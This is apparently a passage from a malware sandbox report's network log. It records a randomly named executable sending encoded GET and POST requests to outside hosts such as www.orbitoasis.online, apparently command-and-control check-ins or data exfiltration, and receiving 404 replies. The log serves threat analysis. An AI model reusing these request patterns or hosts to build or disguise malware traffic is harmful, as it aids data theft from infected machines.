QtKtUpvP=CNSmGsCqDpYV1a9SIiCG+0BDNnmVy2r3piXzS/LlEUpW7G8TBYYLr2SQ/5pNYzNdechSF63Cn8G4SaHdYPDdAXBYeyjW246yr6wg21aElf9PLcLEMg7V8otz7RBLtv4XI+j4J8+41WAxWLf0ZtrT0NluPKhAtV18Q0uvBkw7bueQ2W8eE0RpstMnPRU5msZiKnVS0ouVEEq8dDOwzij6JEP+THoodJO9P9oDLUtrpIkkDyg+9KOPem8UTJZbxSJ6Wp1T9JXZGBqFxOwHQcKXGrjhQ1hyJPdah3x+YdIsk6u1ZnDTyE9/Mcd2MqN7THyazOFQbiiKrslK5rYRddWjEuuBL9TjwZsJXQCbZGtfhV5xUm+JV3s2QndHIA17NhOk0VB2JWRKThRI3d4RQO9F8X7RRRE42M63ULNfXliVLfFRizmq7ufw9O/tqNCOBrWWLUogkH8ot0nAa+dKvzIcmx+VmOP7I93PTXlyDgcEd25jMNtaNs36eecP7QSl2MY44caqwyc+sAnrO+iBjKWW8mZUNjptJW9cs/gapT0pHX2SuIeTuKCeHyNIIDPG6rtuHH3h449uJawfSOo2PdacusVtetdHvk4DgxCV3fekRxdX+/JbnBhmWNiBoRqnUTWcT/DxKEiDQ8wkBuLU9mL7p19cYZfktENfaSKsjAZCca0kFTIUzrgrSbnUTqEfkXMKbvdBa4rcYeF2swxIhKCnTD3iM4BvDYi+EbCjEcz5HDStgwjaHJb0PLcOS9fIhrJhh+obUpPerc5Sr7GKkVxyNyJpGkw6m6upJBlCFBNeNAItceXsFiKmxQ5xk6bobeKIh4DlDuXXkYB1uU1Ebkj5+N3nJMtAMiVoEr70Rl0q7L6SrrxD/ZYLawg5AkBeLjNb1nyKPrSIaEpk1TiEO72VJNZYnrmXXX4Jf6IQ2C+TwNUp2ucf10AQNyVXzEjFrlqOsebTM0IgoywMCs6pOlmOIM7eUyLwftIslQ8dgniAmMM [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49785	23.167.152.41	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:53:22.456754923 CET	506	OUT	GET /a4h7/?QtKtUpvP=PP6GFaOQILwxi5dhMSrYmidfGUiluWiM7xDYUPH7LXca8g8uO5tY4GvA0apkUDdsINAyEZvfq9K0A+PIYqHQIlAkX0zk7pOsjI4l/Wq/rNtJEsfTGHPBsIUykA9D3Lpwbw==&tz=vf30S8fHB HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.75178.club Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49802	66.29.132.194	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:53:29.180366039 CET	778	OUT	POST /k6yn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.orbitoasis.online Origin: http://www.orbitoasis.online Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 209 Connection: close Referer: http://www.orbitoasis.online/k6yn/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 67 50 42 36 32 5a 47 32 79 50 65 30 50 6d 62 50 61 63 6c 65 76 75 48 76 45 39 4e 61 4c 32 51 6c 49 53 38 74 31 48 76 4b 75 31 68 76 34 78 67 47 6f 42 64 61 4a 35 67 59 4f 34 58 56 46 69 41 47 57 73 76 6d 36 51 67 68 59 73 4d 4a 31 65 74 30 50 4b 4a 69 30 41 61 49 35 35 6f 66 69 50 34 50 66 4b 75 57 69 37 56 4e 67 47 46 59 31 39 6a 73 6e 4f 41 67 7a 47 72 33 38 6b 59 54 6f 42 6b 5a 69 72 5a 6a 30 4a 6d 46 32 6c 46 34 34 59 62 74 6c 32 52 46 6b 67 4d 32 44 48 48 6c 66 4a 42 58 39 44 47 77 78 52 39 43 2f 65 75 4e 48 58 6d 35 68 34 47 49 34 4c 61 6a 66 75 41 4c 49 53 77 4e 31 38 67 41 39 49 55 3d Data Ascii: QtKtUpvP=gPB62ZG2yPe0PmbPaclevuHvE9NaL2QlIS8t1HvKu1hv4xgGoBdaJ5gYO4XVFiAGWsvm6QghYsMJ1et0PKJi0AaI55ofiP4PfKuWi7VNgGFY19jsnOAgzGr38kYToBkZirZj0JmF2lF44Ybtl2RFkgM2DHHlfJBX9DGwxR9C/euNHXm5h4GI4LajfuALISwN18gA9IU=
Nov 29, 2024 03:53:30.444200039 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Fri, 29 Nov 2024 02:53:30 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 34 46 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED] Data Ascii: 134FZJvLg!qCV's=pB<w?Kfm( o=\|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s^o/^VL?{fUm7n/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,Dyl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=nKo:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P\|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug\|J
Nov 29, 2024 03:53:30.444257975 CET	1236	IN	Data Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7 Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
Nov 29, 2024 03:53:30.444269896 CET	1236	IN	Data Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82 Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#\|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
Nov 29, 2024 03:53:30.444417000 CET	1236	IN	Data Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91 Data Ascii: m2M3-Et_'lw"L4=yo6&QQE,mvu]iR1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i\|2r.eHQb;q-neJ'q
Nov 29, 2024 03:53:30.444428921 CET	291	IN	Data Raw: 3c 3b db db 55 f3 dd 00 fe 09 f9 2b a1 ae 2f 97 3f 91 e5 9a fd 0f 21 fb 19 a4 fe f4 82 a9 3f 7f aa 89 8b b0 ef ed 78 bd db f3 f0 1f 69 0b a8 f2 9d 02 9e d5 74 f7 ed 11 fe 6c d5 23 fc 91 69 6e c0 f4 01 5f 57 71 e1 95 c5 c7 e7 7a de 7b 65 ff 32 b2 Data Ascii: <;U+/?!?xitl#in_Wqz{e2^^.l;X8KO? =wIn w7c<IiT>c.g\|7{y&{6y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49808	66.29.132.194	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:53:31.835958004 CET	798	OUT	POST /k6yn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.orbitoasis.online Origin: http://www.orbitoasis.online Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 229 Connection: close Referer: http://www.orbitoasis.online/k6yn/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 67 50 42 36 32 5a 47 32 79 50 65 30 4f 46 54 50 4a 74 6c 65 74 4f 48 73 59 74 4e 61 65 47 52 4e 49 54 41 74 31 47 37 67 76 44 78 76 35 51 51 47 76 41 64 61 4f 35 67 59 46 59 58 4d 4c 43 41 37 57 73 79 5a 36 54 34 68 59 74 6f 4a 31 66 64 30 4f 37 4a 39 31 51 61 4b 73 70 6f 64 39 66 34 50 66 4b 75 57 69 37 42 7a 67 43 52 59 31 4f 72 73 6e 73 34 6a 2b 6d 72 77 32 45 59 54 69 52 6b 64 69 72 5a 52 30 4c 53 2f 32 6e 39 34 34 64 6e 74 69 6e 52 47 76 67 4d 73 41 33 47 32 50 62 4d 67 77 67 6d 6c 2b 44 38 49 6a 63 7a 77 4c 42 58 54 37 61 4f 67 72 72 32 62 50 39 49 38 5a 69 52 6b 76 66 77 77 6a 66 43 30 6e 2f 4f 51 68 75 73 33 52 7a 71 36 58 78 45 67 33 38 51 6a Data Ascii: QtKtUpvP=gPB62ZG2yPe0OFTPJtletOHsYtNaeGRNITAt1G7gvDxv5QQGvAdaO5gYFYXMLCA7WsyZ6T4hYtoJ1fd0O7J91QaKspod9f4PfKuWi7BzgCRY1Orsns4j+mrw2EYTiRkdirZR0LS/2n944dntinRGvgMsA3G2PbMgwgml+D8IjczwLBXT7aOgrr2bP9I8ZiRkvfwwjfC0n/OQhus3Rzq6XxEg38Qj
Nov 29, 2024 03:53:33.050056934 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Fri, 29 Nov 2024 02:53:32 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 34 46 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED] Data Ascii: 134FZJvLg!qCV's=pB<w?Kfm( o=\|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s^o/^VL?{fUm7n/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,Dyl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=nKo:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P\|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug\|J
Nov 29, 2024 03:53:33.050118923 CET	1236	IN	Data Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7 Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
Nov 29, 2024 03:53:33.050132990 CET	1236	IN	Data Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82 Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#\|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
Nov 29, 2024 03:53:33.050178051 CET	1236	IN	Data Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91 Data Ascii: m2M3-Et_'lw"L4=yo6&QQE,mvu]iR1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i\|2r.eHQb;q-neJ'q
Nov 29, 2024 03:53:33.050198078 CET	291	IN	Data Raw: 3c 3b db db 55 f3 dd 00 fe 09 f9 2b a1 ae 2f 97 3f 91 e5 9a fd 0f 21 fb 19 a4 fe f4 82 a9 3f 7f aa 89 8b b0 ef ed 78 bd db f3 f0 1f 69 0b a8 f2 9d 02 9e d5 74 f7 ed 11 fe 6c d5 23 fc 91 69 6e c0 f4 01 5f 57 71 e1 95 c5 c7 e7 7a de 7b 65 ff 32 b2 Data Ascii: <;U+/?!?xitl#in_Wqz{e2^^.l;X8KO? =wIn w7c<IiT>c.g\|7{y&{6y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49814	66.29.132.194	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:53:34.493897915 CET	1815	OUT	POST /k6yn/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.orbitoasis.online Origin: http://www.orbitoasis.online Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Connection: close Referer: http://www.orbitoasis.online/k6yn/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 67 50 42 36 32 5a 47 32 79 50 65 30 4f 46 54 50 4a 74 6c 65 74 4f 48 73 59 74 4e 61 65 47 52 4e 49 54 41 74 31 47 37 67 76 44 35 76 35 6d 6b 47 76 6a 46 61 50 35 67 59 47 59 58 52 4c 43 41 71 57 73 37 51 36 55 77 62 59 76 67 4a 31 38 56 30 48 76 6c 39 37 51 61 4b 7a 5a 6f 51 69 50 34 67 66 4f 79 61 69 37 52 7a 67 43 52 59 31 50 37 73 68 2b 41 6a 74 32 72 33 38 6b 59 58 6f 42 6b 6c 69 71 77 6d 30 4c 57 76 32 57 64 34 34 39 58 74 6a 52 4e 47 7a 77 4d 71 4a 6e 48 78 50 62 41 2f 77 67 36 70 2b 43 49 6d 6a 65 7a 77 4a 6b 2b 50 73 70 6d 58 35 70 79 74 64 4e 6b 45 46 45 67 49 67 4f 51 62 73 49 79 4b 6b 4b 33 6e 68 2b 63 59 52 53 58 44 55 33 51 68 6e 49 68 6f 7a 4f 67 6a 59 6a 75 50 71 56 76 75 69 35 74 7a 4e 34 65 42 4b 33 34 6c 47 32 5a 35 38 55 35 33 53 76 49 35 4c 48 70 53 48 7a 58 4d 73 4c 6d 68 62 47 7a 5a 2b 63 30 74 6f 47 2b 46 65 62 6a 67 52 46 6a 35 52 59 57 4a 37 51 33 55 51 33 34 4d 37 70 4e 6d 46 74 6a 41 72 57 67 51 35 44 36 34 57 53 4e 52 43 48 53 73 4b 62 4c 37 79 [TRUNCATED] Data Ascii: QtKtUpvP=gPB62ZG2yPe0OFTPJtletOHsYtNaeGRNITAt1G7gvD5v5mkGvjFaP5gYGYXRLCAqWs7Q6UwbYvgJ18V0Hvl97QaKzZoQiP4gfOyai7RzgCRY1P7sh+Ajt2r38kYXoBkliqwm0LWv2Wd449XtjRNGzwMqJnHxPbA/wg6p+CImjezwJk+PspmX5pytdNkEFEgIgOQbsIyKkK3nh+cYRSXDU3QhnIhozOgjYjuPqVvui5tzN4eBK34lG2Z58U53SvI5LHpSHzXMsLmhbGzZ+c0toG+FebjgRFj5RYWJ7Q3UQ34M7pNmFtjArWgQ5D64WSNRCHSsKbL7yRa5RbwRBw2nWxO4yF9OtplvzcFZPGRzS3e6oh9ELQWXJkE0dwLjwEb+mFNDd7xHfHseKiE1wMtMXwcCOtVhzRs4i+ADQ4cClXZ8yM35kiulUiqq4XOdVwHDkKWODQuAF2sEBkAtnDizSgvK8EChj8UXKsdfYwCc+9t43ZarNF6LrI6n25G+G5yPq0BllPTUNpxjf0m7iaG5hnrPnDSnt2Rh9ZmFFyy++XFdsJSIxAl0qeBPRjsy35rmMxCALz4VltAFG+6+BLrwLdZJR/6qPB+kC83r5R8wpksIxrlnPBSAlySgWO+2AqD15eVmm6FpQL6xjD3bvTX0UTAhxaN18WQH5b9GWzO3VZfZLrH/EHHb7B2VmAdiyJbsalp91JmrrQyIIXhx5R05zslF0ym+jItxP8/rThpJ+Ss+w0uIQ2qsIMdM1sOZcMjQ9VR/0r/bExpoyWYVHAAhqeo03vSTsl5EspD6CuXAeR9GogjyKVp0GTw/Xyfk3E/8ujfd/FQ97Nr0xQlETp+iWfsdMZf/5DiPbek+uqTkmHmeQXvtzxxd4YYSOEgDsmCrQJWss6KBHKXcpDzfEa+Fcbj4euPYWLoezAISxUaEAKQLz9tJaLAbh6FcRN7dIon6o3G0sgqIuwBtNhmzpieEM9WnxGKDAs9OYyKTKWFoDtl [TRUNCATED]
Nov 29, 2024 03:53:35.828716993 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Fri, 29 Nov 2024 02:53:35 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED] Data Ascii: 1359ZJvLg!qCV's=pB<w?Kfm( o=\|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s^o/^VL?{fUm7n/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,Dyl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=nKo:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P\|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug\|J
Nov 29, 2024 03:53:35.828741074 CET	1236	IN	Data Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7 Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
Nov 29, 2024 03:53:35.828752995 CET	1236	IN	Data Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82 Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#\|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
Nov 29, 2024 03:53:35.828871965 CET	1236	IN	Data Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91 Data Ascii: m2M3-Et_'lw"L4=yo6&QQE,mvu]iR1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i\|2r.eHQb;q-neJ'q
Nov 29, 2024 03:53:35.828882933 CET	286	IN	Data Raw: 79 76 b6 b7 ab e6 bb 01 fc 13 f2 57 42 5d 5f 2e 7f 22 cb 35 fb 1f 42 f6 33 48 fd e9 05 53 7f fe 54 13 17 61 df db f1 7a b7 e7 e1 3f d2 16 50 e5 3b 05 3c ab e9 ee db 23 fc d9 aa 47 f8 23 d3 dc 80 e9 03 be ae e2 c2 2b 8b 8f cf f5 bc f7 ca fe 65 64 Data Ascii: yvWB]_."5B3HSTaz?P;<#G#+ed:y:4S7k]%Y]sw$w:qg>'~;@A:z4%' A n\x=(\|<k]/;q5^g/5o(5Ll6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49819	66.29.132.194	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:53:37.143255949 CET	513	OUT	GET /k6yn/?QtKtUpvP=tNpa1p20+8HvGGTGCcJ0ltHXQ7hkDEI9aQgmgnvjgQBap2YCvQVXfu4lL5fLGicbWcSejDEnKeIqzsVAbPYV6Q7f6sEw+fEYYIvxzrJruwJPw/20oMsQ+GrA/2J3jy9WwQ==&tz=vf30S8fHB HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.orbitoasis.online Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
Nov 29, 2024 03:53:38.402761936 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked date: Fri, 29 Nov 2024 02:53:38 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 32 37 38 33 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 